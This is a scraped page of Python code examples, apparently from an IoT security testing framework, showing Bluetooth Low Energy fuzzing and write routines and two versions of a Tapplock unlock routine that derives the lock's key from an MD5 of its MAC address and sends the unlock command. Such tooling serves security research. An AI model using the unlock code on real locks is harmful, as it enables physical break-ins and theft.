Beispiel #1
0
    def execute(self):
        """Execute the test."""
        TLog.generic(
            "Fuzzing the value ({}), iterations ({}) for handle ({}) on BLE device ({})"
            .format(self.args.value, self.args.iter, hex(self.args.handle),
                    self.args.addr))
        try:
            device = BlePeripheral()
            device.connect(
                self.args.addr,
                addrType=(Ble.ADDR_TYPE_RANDOM
                          if self.args.randaddrtype else Ble.ADDR_TYPE_PUBLIC),
            )
            for _ in range(self.args.iter):
                value = self.args.value
                while value.find("xx") >= 0:
                    value = value.replace(
                        "xx",
                        "{:02x}".format(randint(0, 0xFF)),
                        1  # nosec
                    )

                TLog.trydo("Writing the fuzzed value ({})".format(value))
                device.writeCharacteristic(
                    self.args.handle,
                    bytes.fromhex(value),
                    withResponse=(not self.args.noresponse),
                )
        except:  # noqa: E722
            self.result.exception()
        finally:
            device.disconnect()
Beispiel #2
0
 def execute(self):
     """Execute the test."""
     TLog.generic(
         "Writing the value ({}) to handle ({}) on BLE device ({})".format(
             self.args.value, hex(self.args.handle), self.args.addr
         )
     )
     device = BlePeripheral()
     try:
         device.connect(
             self.args.addr,
             addrType=(
                 ADDR_TYPE_RANDOM
                 if self.args.randaddrtype
                 else ADDR_TYPE_PUBLIC
             ),
         )
         device.writeCharacteristic(
             self.args.handle,
             bytes.fromhex(self.args.value),
             withResponse=(not self.args.noresponse),
         )
     except:  # noqa: E722
         self.result.exception()
     finally:
         device.disconnect()
    def unlock(self, mac, name=None):
        """
        Unlock the specified Tapplock.

        Args:
            mac(str): The BLE address of the Tapplock
            name(str): The name of the Tapplock as advertised over BLE

        Returns:
            Nothing
        """
        device = BlePeripheral()
        try:
            TLog.trydo("Unlocking Tapplock ({})".format(mac))
            # Get key1 and serial
            pairing_data = None
            if self.args.default is False:
                remote_mac = ":".join(mac.upper().split(":")[::-1])
                md5_hash = md5(remote_mac.encode()).hexdigest()  # nosec
                key1 = md5_hash[0:8]
                serial = md5_hash[16:24]
                TLog.generic(
                    "(Calculated hash={})(key1={})(serial={})".format(
                        md5_hash, key1, serial
                    )
                )
                pairing_data = self.PAIRPREXIX + key1 + serial
            else:
                TLog.generic(
                    "(default key1={})(default serial={})".format(
                        self.DEFKEY, self.DEFSERIAL
                    )
                )
                pairing_data = self.DEFPAIR
            # Calculate the checksum
            checksum = 0
            for byte in bytes.fromhex(pairing_data):
                checksum = checksum + (byte % 255)
            checksum_string = "{:04x}".format(checksum)
            # Create the pairing data
            pairing_data = pairing_data + checksum_string[2:4] + checksum_string[0:2]
            device.connect(mac, addrType=ADDR_TYPE_RANDOM)
            device.writeCharacteristic(self.UNLOCKHNDL, bytes.fromhex(pairing_data))
            device.writeCharacteristic(self.UNLOCKHNDL, bytes.fromhex(self.UNLOCKCMD))
            self.output_handler(tlogtype=TLog.TRYDO,
                                logkwargs=LOGPRETTY,
                                name=name,
                                addr=device.addr,
                                sent_pair_data=pairing_data,
                                sent_unlock_cmd=self.UNLOCKCMD)
        finally:
            device.disconnect()
Beispiel #4
0
    def unlock(self, mac):
        """
        Unlock the specified Tapplock.

        :param mac: The BLE address of the Tapplock
        :return:
        """
        device = BlePeripheral()
        try:
            TLog.trydo("Unlocking Tapplock ({})".format(mac))
            # Get key1 and serial
            pairing_data = None
            if self.args.default is False:
                remote_mac = ":".join(mac.upper().split(":")[::-1])
                md5_hash = md5(remote_mac.encode()).hexdigest()  # nosec
                key1 = md5_hash[0:8]
                serial = md5_hash[16:24]
                TLog.generic("(Calculated hash={})(key1={})(serial={})".format(
                    md5_hash, key1, serial))
                pairing_data = self.PAIRPREXIX + key1 + serial
            else:
                TLog.generic("(default key1={})(default serial={})".format(
                    self.DEFKEY, self.DEFSERIAL))
                pairing_data = self.DEFPAIR
            # Calculate the checksum
            checksum = 0
            for byte in bytes.fromhex(pairing_data):
                checksum = checksum + (byte % 255)
            checksum_string = "{:04x}".format(checksum)
            # Create the pairing data
            pairing_data = pairing_data + checksum_string[
                2:4] + checksum_string[0:2]
            device.connect(mac, addrType=ADDR_TYPE_RANDOM)
            TLog.trydo("Sending pair data({})".format(pairing_data))
            device.writeCharacteristic(self.UNLOCKHNDL,
                                       bytes.fromhex(pairing_data))
            TLog.trydo("Sending unlock command({})".format(self.UNLOCKCMD))
            device.writeCharacteristic(self.UNLOCKHNDL,
                                       bytes.fromhex(self.UNLOCKCMD))
        finally:
            device.disconnect()
Beispiel #5
0
    def execute(self):
        TLog.generic(
            "Fuzzing the value ({}), iterations ({}) for handle ({}) on BLE device ({})"
            .format(self.args.value, self.args.iter, hex(self.args.handle),
                    self.args.addr))
        try:
            d = BlePeripheral()
            d.connect(self.args.addr,
                      addrType=(Ble.ADDR_TYPE_RANDOM if self.args.randaddrtype
                                else Ble.ADDR_TYPE_PUBLIC))
            for i in range(self.args.iter):
                f = self.args.value
                while f.find("xx") >= 0:
                    f = f.replace("xx", "{:02x}".format(randint(0, 0xff)), 1)

                TLog.trydo("Writing the fuzzed value ({})".format(f))
                d.writeCharacteristic(self.args.handle,
                                      bytes.fromhex(f),
                                      withResponse=(not self.args.noresponse))
        except:
            self.result.exception()
        finally:
            d.disconnect()